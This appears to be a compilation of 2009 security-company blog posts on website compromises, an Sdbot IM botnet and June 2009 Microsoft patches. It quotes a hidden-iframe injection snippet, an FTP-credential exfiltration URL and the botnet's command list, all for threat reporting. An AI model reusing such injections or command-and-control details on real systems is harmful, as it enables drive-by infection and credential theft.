Several Turkish governmental websites have come under web attacks. The following websites have been compromised and obfuscated JavaScripts and IFrame tags have been injected into them:

http://[hidden]isar.meb.gov.tr
http://[hidden]ele.meb.gov.tr
http://[hidden]kale.meb.gov.tr
http://[hidden]lu-gsim.gov.tr
http://[hidden]zigrsh.gov.tr

Each of the IFrame tags leads to a different malicious domain which ends up downloading a variety of Trojans including infostealers, and botnet Trojans.

One of the IFrames leads to a bit interesting malicious script with a 0 detection rate in VirusTotal (We have already added a signature for this script, and it will be available in the next update).

That obfuscated script involves a great deal of HTML tags in the obfuscation routine in such a way it saves data, needed for the de-obfuscation JavaScript routine, into HTML tags.

The script then downloads a Trojan Downloader which once it runs, downloads another FTP accounts stealing Trojan. The latter searches the file system and the registry for multiple FTP clients for saved FTP accounts and sends them to a Chinese domain:
http://f97q.cn/r4/t1.php

The website of the embassy of Belize in Taiwan has been compromised and an obfuscated JavaScript has been injected into it.

After decoding, the script reveals itself as an IFrame pointing to one of the pages on the Kaohsiung Medical University website:

<iframe src="http://[HIDDEN].club.kmu.edu.tw/ice/index.php" width="0" height="0"></iframe>

We are all too familiar with the usual scenario where hackers compromise a legitimate website so that its visitors get redirected to the hacker’s own servers where the exploitation kit is hosted. The ironic thing this time is the fact that hackers didn’t redirect victims to servers of their own, but to the university website which they have compromised and installed their exploit kit (probably an ice-pack) on it, and which they have used for other compromised websites.

At the time of writing, however, the exploit-kit has been removed from the university website.

Microsoft has released a security bulletin for June 2009 to address three vulnerabilities in Microsoft Windows products, six of them are critical. We strongly suggest applying the patches provided by Microsoft for these vulnerabilities.

Critical

Vulnerabilities in Active Directory Could Allow Remote Code Execution
This security update resolves two privately reported vulnerabilities in implementations of Active Directory on Microsoft Windows 2000 Server and Windows Server 2003, and Active Directory Application Mode (ADAM) when installed on Windows XP Professional and Windows Server 2003.

The patch and additional information are available here.

Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution
This security update resolves three privately reported vulnerabilities in Windows Print Spooler. The most severe vulnerability could allow remote code execution if an affected server received a specially crafted RPC request.

The patch and additional information are available here.

Cumulative Security Update for Internet Explorer
This security update resolves seven privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The more severe of the vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.

The patch and additional information are available here.

Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution
This security update resolves two privately reported vulnerabilities that could allow remote code execution if a user opens a specially crafted Word file. An attacker who successfully exploited either vulnerability could take complete control of an affected system.

The patch and additional information are available here.

Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution
This security update resolves several privately reported vulnerabilities that could allow remote code execution if a user opens a specially crafted Excel file that includes a malformed record object. An attacker who successfully exploited any of these vulnerabilities could take complete control of an affected system.

The patch and additional information are available here.

Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution
This security update resolves a privately reported vulnerability in the Microsoft Works converters. The vulnerability could allow remote code execution if a user opens a specially crafted Works file. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user.

The patch and additional information are available here.

Important

Vulnerability in RPC Could Allow Elevation of Privilege
This security update resolves a publicly disclosed vulnerability in the Windows remote procedure call (RPC) facility where the RPC Marshalling Engine does not update its internal state appropriately. The vulnerability could allow an attacker to execute arbitrary code and take complete control of an affected system.

The patch and additional information are available here.

Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
This security update resolves two publicly disclosed and two privately reported vulnerabilities in the Windows kernel that could allow elevation of privilege. An attacker who successfully exploited any of these vulnerabilities could execute arbitrary code and take complete control of an affected system.

The patch and additional information are available here.

Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege
This security update resolves one publicly disclosed vulnerability and one privately reported vulnerability in Microsoft Internet Information Services (IIS). The vulnerabilities could allow elevation of privilege if an attacker sent a specially crafted HTTP request to a Web site that requires authentication.

The patch and additional information are available here.

Moderate

Vulnerability in Windows Search Could Allow Information Disclosure
This security update resolves a privately reported vulnerability in Windows Search. The vulnerability could allow information disclosure if a user performs a search that returns a specially crafted file as the first result or if the user previews a specially crafted file from the search results.

The patch and additional information are available here.

Refrences:

• Microsoft Security Bulletin Summary for June 2009

In this blog post I’ll examine a botnet attack utilizing Instant Messaging services such as AIM and Live Messenger to recruit infected computers. This botnet spreads a malicious Sdbot variant with a low detection rate; the following is a detailed technical analysis of this bot.

The Attack Vector
The Trojan itself arrives through MSN Messenger as a message with a link sent out by contacts with infected systems. Here is an example of a sent message:

Once the user clicks on the link, an executable will be downloaded into the user’s system. However, for launching the executable, the user must run it manually.

The downloaded executable is a Win32 Cabinet Self-Extractor given a name which makes it appear like an image file: IMG000985215488524-JPEG.EXE.

This Trojan has a very low detection rate according to VirusTotal. Up to the time of writing, only 7 out of 40 AV products detect this bot.

The Cabinet Self-Extractor file drops a file named d.exe, which has another packed PE file in its resource section (the file is packed with some private packer).

The decoding routine

The decoding routine of the bot (part 1).

The decoding routine of the bot (part 2).

The decoding routine of the bot (part 3).

Now, to get the new executable, we can simply dump the memory into a file and using a HexEditor, we cut the junk data from the beginning of the dump file:  

And using a tool such as Stud_PE to cut off the extra data at the end of the dump file:

Now we have the real Trojan. In a quick glance, we can clearly see it is an IRC bot and to be more accurate, it’s an SdBot which connects to an IRC server and joins a channel waiting for further commands from its operators.

The detection rate in VirusTotal gets better now, where 21 out of 40 detect this bot:

The following are the commands used by this botnet:
login || l
logout || lo
rm
download
update
gone || rmzerm3b1tch
threads || t
r.getfile
r.new
r.update || r.upd4te
msn.msg
msn.stop
aim.msg
aim.stop
trion.msg
trion.stop

Inspecting into the strings list of the new executable, we can see that the bot’s multiple functionalities include:
- Download and execute remote files
- Registry manipulation
- Services manipulation
- Opening sockets, including sending and receiving data through sockets
- Sending/Downloading data through HTTP
- Uploading/Downloading files through FTP
- DNS manipulation
- Open ports in the infected systems and hide those ports
- Retrieve TCP, UDP listener tables
- Retrieve MIB-II interface table
- Retrieve IP-to-physical address mapping table
- Add/Remove Network Connections
- Keylogging
- ARP table manipulation
- ODBC functionalities

Once again, eCriminals took advantage of a legitimate and popular website as an attack vector for the purpose of propagating Malweb. Layla.co.il, a popular nightlife website in Israel, was compromised by eCriminals and is serving up a malicious bot to its visitors.


Image 1: Entries in our AID (Attack Intelligence Datacenter) indicating that layla.co.il contains MalWeb.

A hidden IFrame tag has been injected in all pages under “campaign” directory. The IFrame loads a malicious page which will attempt to download and execute a Trojan using one of the following exploits:
1. Microsoft Access Snapshot Viewer ActiveX Control Exploit
2. SWF Exploit
3. PDF Exploit

The downloaded malware executable is a bot instructed to download a rootkit which will function as a sort of keeper for it. The rootkit installs itself as a service named: “DCOM Server Process Launcher DcomLaunchMessenger”.

To evade detection, this Trojan prevents a long list of Antivirus and security applications from running.

Once the bot is launched, it sends some information to its C&C (Command and Control) system hosted at a Ukrainian server.

More than 200000 machines worldwide have been infected by this attack so far; each infected machine joins an army of botnet zombie machines ready to be controlled by eCriminals to launch cyber attacks. The following is a map showing the distribution of infected machines.


Image 2: A distribution map showing the locations of machines infected by the attack.